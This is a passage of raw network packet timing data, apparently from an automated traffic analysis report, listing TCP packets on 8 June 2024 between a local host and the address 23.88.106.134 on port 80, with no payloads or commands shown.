Jun 8, 2024 20:22:01.618820906 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.618833065 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.618839025 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.618854046 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.618866920 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.618874073 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.618894100 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.618911982 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.618927956 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.618928909 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.618946075 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.618946075 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.618967056 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.618985891 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.618987083 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.619003057 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.619009018 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.619019985 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.619045019 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.619045019 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.619065046 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.619081974 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.619082928 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.619097948 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.619100094 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.619141102 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.619146109 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.619163990 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.619172096 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.619190931 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.619200945 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.619208097 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.619220972 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.619227886 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.619245052 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.619246960 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.619261980 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.619266033 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.619281054 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.619297981 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.619307041 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.619314909 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.619327068 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.619334936 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.619352102 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.619352102 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.619374037 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.619388103 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.619426012 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.619573116 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.619590044 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.619606972 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.619626999 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.619630098 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.619668961 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.619685888 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.619801998 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.619818926 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.619837046 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.619853020 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.619857073 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.619872093 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.619878054 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.619889021 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.619899035 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.619908094 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.619924068 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.619930983 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.619940996 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.619957924 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.619971037 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.619975090 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.619992018 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.619995117 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.620023966 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.620054960 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.620066881 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.620084047 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.620100975 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.620116949 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.620120049 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.620138884 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.620138884 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.620156050 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.620157003 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.620174885 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.620176077 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.620206118 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.620213985 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.620230913 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.620245934 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.620249033 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.620265007 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.620290995 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.620315075 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.620528936 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.620544910 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.620562077 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.620580912 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.620613098 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.620637894 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.620655060 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.620671034 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.620688915 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.620690107 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.620706081 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.620723009 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.620728970 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.620739937 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.620790005 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.620790005 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.620815992 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.620840073 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.620857000 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.620867014 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.620872974 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.620891094 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.620898962 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.620908022 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.620918989 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.620927095 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.620943069 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.620959997 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.620961905 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.620975971 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.620984077 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.621005058 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.621020079 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.621021986 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.621041059 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.621056080 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.621062994 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.621083021 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.621119976 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.621156931 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.621175051 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.621208906 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.621237040 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.623565912 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.623625040 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.623859882 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.623914957 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.623992920 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.624010086 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.624067068 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.624067068 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.624335051 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.624351025 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.624367952 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.624383926 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.624387980 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.624425888 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.624425888 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.624756098 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.624772072 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.624787092 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.624804974 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.624810934 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.624831915 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.624855042 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.624883890 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.625277042 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.625293970 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.625308990 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.625324965 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.625334024 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.625365973 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.625396013 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.625720978 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.625736952 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.625754118 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.625771046 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.625777006 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.625787973 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.625797033 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.625806093 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.625823021 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.625832081 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.625839949 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.625849962 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.625886917 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.626724005 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.626748085 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.626796007 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.626838923 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.626859903 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.626876116 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.626892090 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.626908064 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.626910925 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.626925945 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.626945972 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.626945972 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.626962900 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.626979113 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.626985073 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.627007008 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.627012014 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.627032042 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.627038002 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.627054930 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.627077103 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.627082109 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.627104998 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.627109051 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.627130032 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.627131939 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.627149105 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.627155066 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.627166033 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.627183914 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.627201080 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.627207994 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.627207994 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.627218962 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.627235889 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.627244949 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.627255917 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.627269030 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.627283096 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.627298117 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.627306938 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.627315044 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.627332926 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.627350092 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.627351999 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.627377987 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.627378941 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.627396107 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.627401114 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.627410889 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.627422094 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.627429008 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.627454042 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.627458096 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.627479076 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.627495050 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.627511024 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.627513885 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.627528906 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.627546072 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.627557039 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.627573013 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.627579927 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.627603054 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.627609968 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.627628088 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.627644062 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.627645016 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.627662897 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.627665043 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.627681017 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.627686024 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.627698898 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.627703905 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.627716064 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.627722979 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.627734900 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.627751112 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.627760887 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.627768993 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.627790928 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.627790928 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.627818108 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.627831936 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.627835035 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.627854109 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.627852917 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.627871990 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.627888918 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.627892017 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.627903938 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.627918005 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.627931118 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.627937078 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.627958059 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.627973080 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.627989054 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.627990007 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.627990007 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.628006935 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.628011942 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.628024101 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.628041029 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.628050089 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.628058910 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.628077984 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.628087997 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.628093958 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.628110886 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.628118038 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.628127098 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.628139973 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.628145933 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.628164053 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.628176928 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.628180027 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.628196001 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.628211975 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.628217936 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.628226995 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.628245115 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.628257036 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.628263950 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.628278971 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.628281116 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.628298044 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.628310919 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.628317118 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.628329992 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.628334999 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.628355980 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.628365993 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.628376007 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.628392935 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.628392935 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.628410101 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.628417015 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.628427029 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.628439903 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.628443956 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.628462076 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.628477097 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.628503084 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.628506899 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.628508091 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.628518105 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.628535986 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.628537893 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.628555059 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.628568888 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.628576994 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.628596067 CEST	80	49731	23.88.106.134	192.168.2.4
